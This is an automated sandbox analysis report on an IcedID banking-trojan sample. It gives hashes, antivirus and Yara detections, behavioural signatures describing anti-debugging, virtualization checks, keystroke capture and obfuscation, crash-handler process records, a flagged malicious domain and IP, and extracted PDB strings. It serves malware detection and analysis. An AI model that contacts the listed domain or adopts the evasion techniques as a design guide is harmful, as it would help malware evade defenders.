Loading ...

Play interactive tourEdit tour

Analysis Report sample4.bin

Overview

General Information

Sample Name:sample4.bin (renamed file extension from bin to exe)
Analysis ID:339451
MD5:5009b8bcf024704c8b23e42c492f118c
SHA1:df607367a88b5610a224909efb8debeb0d90f487
SHA256:30f099660904079afcd445409cfd2eca735fab49dda522f03ed60d47f9f21bdc

Most interesting Screenshot:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected IcedID
Yara detected IcedID
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • sample4.exe (PID: 2100 cmdline: 'C:\Users\user\Desktop\sample4.exe' MD5: 5009B8BCF024704C8B23E42C492F118C)
    • WerFault.exe (PID: 1488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 768 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5920 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 804 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 620 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 896 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5008 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 924 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 1224 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmpJoeSecurity_IcedID_3Yara detected IcedIDJoe Security
    00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmpJoeSecurity_IcedID_3Yara detected IcedIDJoe Security
      Process Memory Space: sample4.exe PID: 2100JoeSecurity_IcedID_1Yara detected IcedIDJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.sample4.exe.d0000.0.unpackJoeSecurity_IcedID_3Yara detected IcedIDJoe Security

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: sample4.exeAvira: detected
          Multi AV Scanner detection for domain / URLShow sources
          Source: gegemony4you.topVirustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: sample4.exeVirustotal: Detection: 77%Perma Link
          Source: sample4.exeReversingLabs: Detection: 79%
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: Process Memory Space: sample4.exe PID: 2100, type: MEMORY
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: 00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.sample4.exe.d0000.0.unpack, type: UNPACKEDPE

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\sample4.exeUnpacked PE file: 0.2.sample4.exe.d0000.0.unpack
          Source: sample4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: unknownHTTPS traffic detected: 104.244.42.131:443 -> 192.168.2.3:49761 version: TLS 1.2
          Source: sample4.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000011.00000003.373483424.0000000004FC2000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: cryptbase.pdbT source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb6 source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdb7 source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.373483424.0000000004FC2000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb) source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdb? source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
          Source: Binary string: winnsi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
          Source: Binary string: dnsapi.pdbf source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: schannel.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: rasadhlp.pdbt source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdb- source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdb, source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: ws2_32.pdbx source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdbl source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: comdlg32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdb| source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: nsi.pdb source: WerFault.exe, 00000011.00000003.373534997.0000000004FD3000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391511057.0000000004C84000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: webio.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: oleacc.pdb1 source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb7 source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdbH source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdb# source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
          Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdb~ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
          Source: Binary string: msimg32.pdbT source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb1 source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb/ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: comctl32v582.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: ole32.pdb) source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: Kernel.Appcore.pdb/ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdb& source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdb` source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: wininet.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: oleacc.pdb^ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdb" source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: ncryptsslp.pdb= source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: c:\Schoolwheel\Commontie\hithere\anyhit\Subtractmountain\TakeLand\Whilecardstone.pdb source: sample4.exe
          Source: Binary string: nsi.pdb_ source: WerFault.exe, 00000011.00000003.373534997.0000000004FD3000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391511057.0000000004C84000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: wmswsock.pdbh source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: wininet.pdb; source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416219741.00000000052E6000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441846238.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: oleacc.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb; source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wininet.pdbJ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: shlwapi.pdb# source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp
          Source: Binary string: winnsi.pdbZ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: mskeyprotect.pdb_ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb5 source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb- source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb% source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: winhttp.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: msimg32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdbF source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb, source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp
          Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000011.00000003.368397809.0000000004C0E000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.385905313.0000000004A4D000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.409232348.0000000002FAA000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.436877307.00000000051E4000.00000004.00000001.sdmp
